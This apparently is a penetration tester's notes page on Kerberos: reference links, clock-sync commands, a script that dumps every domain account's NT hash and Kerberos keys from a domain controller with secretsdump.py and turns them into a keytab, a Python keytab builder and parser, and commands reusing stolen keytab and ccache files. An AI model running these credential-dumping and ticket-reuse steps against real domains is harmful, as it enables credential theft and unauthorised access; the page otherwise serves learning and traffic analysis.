- https://www.roguelynn.com/words/explain-like-im-5-kerberos/
- https://vbscrub.com/2020/05/13/kerberos-protocol-explained/
- https://www.tarlogic.com/en/blog/how-kerberos-works/
- https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
- https://www.tarlogic.com/en/blog/kerberos-iii-how-does-delegation-work/
- https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
- https://habr.com/ru/company/tomhunter/blog/507140/
- https://habr.com/ru/company/tomhunter/blog/509290/
- https://ardent101.github.io/posts/kerberos_theory/
- https://ardent101.github.io/posts/kerberos_general_attacks/
- https://habr.com/ru/articles/803163/
{% embed url="https://youtu.be/qZPvgoUzCdI" %}
Using ntpdate:

```
$ sudo apt install ntpdate -y
$ sudo ntpdate $DC
```

Using faketime:

```
$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date
```
- https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/
- https://medium.com/tenable-techblog/decrypt-encrypted-stub-data-in-wireshark-deb132c076e7
{% code title="keytab.sh" %}
REALM='MEGACORP.LOCAL'
# Dump NT hashes and Kerberos keys of all domain accounts from the DC
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out
# ---
# NT hash lines carry the empty LM hash (aad3b435...): field 4 is the NT hash, used as the rc4-hmac key (enctype 23)
cat secretsdump.out | grep aad3b435 | awk -F: '{print " (23, '\''"$4"'\''),"}' > keys
# AES256 lines: field 3 is the aes256-cts-hmac-sha1-96 key (enctype 18)
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print " (18, '\''"$3"'\''),"}' >> keys
# Splice the collected tuples into dirkjanm's keytab.py in place of its sample key list (lines 113-117), set the realm and build the keytab
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt
{% endcode %}
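The same kind of keytab can be written without patching keytab.py. The following is an added example (not the page's or dirkjanm's code) that emits a version 0x0502 MIT keytab from (principal, enctype, hex key) tuples with the same 23/18 enctype numbering as the awk output above, and parses it back so you can check what a keytab contains before feeding it to Wireshark; the principal names and keys in SAMPLE_KEYS are constructed, and the kvno of 2 is an assumption.

```python
import struct
# Constructed sample entries, not real credentials: (principal, enctype, hex key).
# enctype 23 = rc4-hmac (the NT hash), 18 = aes256-cts-hmac-sha1-96.
SAMPLE_KEYS = [
    ("krbtgt", 23, "31d6cfe0d16ae931b73c59d7e0c089c0"),  # NT hash of ""
    ("MSSQLSvc/SRV01.megacorp.local:1433", 18, "ab" * 32),
]

def _counted(b):  # 16-bit big-endian length prefix + bytes
    return struct.pack(">H", len(b)) + b
def keytab_entry(realm, principal, enctype, key_hex, kvno=2, name_type=1, timestamp=0):
    # Record layout: ncomp, realm, components, name_type, timestamp, vno8, keyblock, vno32
    comps = principal.split("/")
    body = struct.pack(">H", len(comps)) + _counted(realm.encode())
    for c in comps:
        body += _counted(c.encode())
    body += struct.pack(">IIB", name_type, timestamp, kvno & 0xFF)
    body += struct.pack(">H", enctype) + _counted(bytes.fromhex(key_hex))
    body += struct.pack(">I", kvno)  # 32-bit kvno extension overrides vno8
    return struct.pack(">i", len(body)) + body  # every record is length-prefixed

def build_keytab(realm, keys):
    return b"\x05\x02" + b"".join(keytab_entry(realm, p, e, k) for p, e, k in keys)

def _read_counted(data, pos):
    (n,) = struct.unpack(">H", data[pos:pos + 2])
    return data[pos + 2:pos + 2 + n], pos + 2 + n

def parse_keytab(data):
    """Return [(principal@REALM, enctype, key_hex, kvno)] for every live record."""
    assert data[:2] == b"\x05\x02", "not a version-2 keytab"
    out, pos = [], 2
    while pos + 4 <= len(data):
        size, pos = int.from_bytes(data[pos:pos + 4], "big", signed=True), pos + 4
        if size < 0:  # negative size marks a deleted slot; skip its bytes
            pos -= size; continue
        end = pos + size
        (ncomp,) = struct.unpack(">H", data[pos:pos + 2])
        realm, pos = _read_counted(data, pos + 2)
        comps = []
        for _ in range(ncomp):
            c, pos = _read_counted(data, pos)
            comps.append(c.decode())
        _name_type, _ts, vno8 = struct.unpack(">IIB", data[pos:pos + 9])
        (enctype,) = struct.unpack(">H", data[pos + 9:pos + 11])
        key, pos = _read_counted(data, pos + 11)
        kvno = struct.unpack(">I", data[pos:pos + 4])[0] if end - pos >= 4 else vno8
        out.append(("/".join(comps) + "@" + realm.decode(), enctype, key.hex(), kvno))
        pos = end
    return out
```

Write `build_keytab("MEGACORP.LOCAL", SAMPLE_KEYS)` to a file and point Wireshark's Kerberos protocol preferences at it; `parse_keytab` over an existing keytab.kt shows which principals and enctypes it actually holds.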
- https://github.com/OtterHacker/Cerbere
- https://xakep.ru/2023/04/04/no-mimikatz/
- https://github.com/MzHmO/articles/tree/main/Ticket%20Injector
- https://github.com/MzHmO/PowershellKerberos
Check KRB5CCNAME environment variable contents:

```
$ env | grep KRB5
```

Request TGT supplying password:

```
$ kinit
$ klist
```

List available SPNs:

```
$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "[email protected]" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName
```

Request TGS for MSSQL service:

```
$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist
```

Re-using keytab files to load and renew a TGT:

```
$ kinit [email protected] -k -t /tmp/administrator.keytab
$ klist
$ kinit -R
```

Re-using ccache files (the variable MIT Kerberos reads is KRB5CCNAME):

```
$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCNAME=/tmp/krb5cc_31337
$ klist
```
- https://tishina.in/ops/freeipa-postexploitation
- https://habr.com/ru/companies/rvision/articles/825086/
A blog series by @n0pe_sled on attacking FreeIPA: